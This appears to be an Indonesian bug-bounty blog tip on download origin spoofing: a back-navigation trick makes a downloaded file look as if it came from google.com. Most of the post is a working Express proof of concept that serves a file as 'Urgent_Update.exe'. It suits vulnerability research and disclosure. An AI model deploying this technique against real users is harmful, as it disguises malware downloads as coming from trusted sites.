History Manipulation Enables Fake Downloads on Back Navigation (origin spoofing)

Hai, saya ingin membagikan tips untuk menemukan kerentanan origin spoofing pada file download melalui teknik History Manipulation Enables Fake Downloads on Back Navigation.
Singkatnya seperti ini:
Seorang pengguna akan diarahkan (redirect) ke situs terpercaya seperti google.com. Lalu, ketika pengguna menekan tombol "Back" (navigasi kembali) untuk kembali ke situs sebelumnya, secara otomatis akan terjadi proses download file.
Yang menarik adalah — jika kita periksa di riwayat download browser, file tersebut akan terlihat seperti berasal dari google.com (atau situs terpercaya lainnya), padahal sebenarnya tidak. Ini bisa dianggap sebagai kerentanan yang valid karena terjadi spoofing pada origin download.
ini source code nya dan anda bisa mencoba nya sendiri :
node.js
const express = require('express');
const fs = require('fs');
const path = require('path');
const app = express();
const PORT = 3000;
let redirect = false;
app.get('/', (req, res) => {
redirect = true;
res.setHeader('Cache-Control', 'no-store');
res.redirect('/index.html');
});
app.get('/index.html', (req, res) => {
res.setHeader('Cache-Control', 'no-store');
if (redirect) {
redirect = false;
res.sendFile(path.join(__dirname, 'index.html'));
} else {
res.redirect('/data');
}
});
app.get('/data', (req, res) => {
const filePath = path.join(__dirname, 'malware');
if (!fs.existsSync(filePath) || fs.statSync(filePath).isDirectory()) {
return res.status(404).send('File not found');
}
res.setHeader('Cache-Control', 'no-store');
res.setHeader('Content-Type', 'application/octet-stream');
res.setHeader('Content-Disposition', 'attachment; filename=\"Urgent_Update.exe\"');
fs.createReadStream(filePath).pipe(res);
});
app.listen(PORT, () => {
console.log(`Server running on http://localhost:${PORT}`);
});
index.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Back</title>
</head>
<body>
<h1>POC SITE</h1>
<a href="https://google.com">google.com</a>
</body>
</html>


![[Bug Bounty] Race Condition: Redeeming Single-Use Coupon Multiple Times](/_next/image?url=https%3A%2F%2Fcdn.hashnode.com%2Fres%2Fhashnode%2Fimage%2Fupload%2Fv1770116456998%2F629ff44d-4a0a-4445-91bf-c37d3e84c104.jpeg&w=3840&q=75)
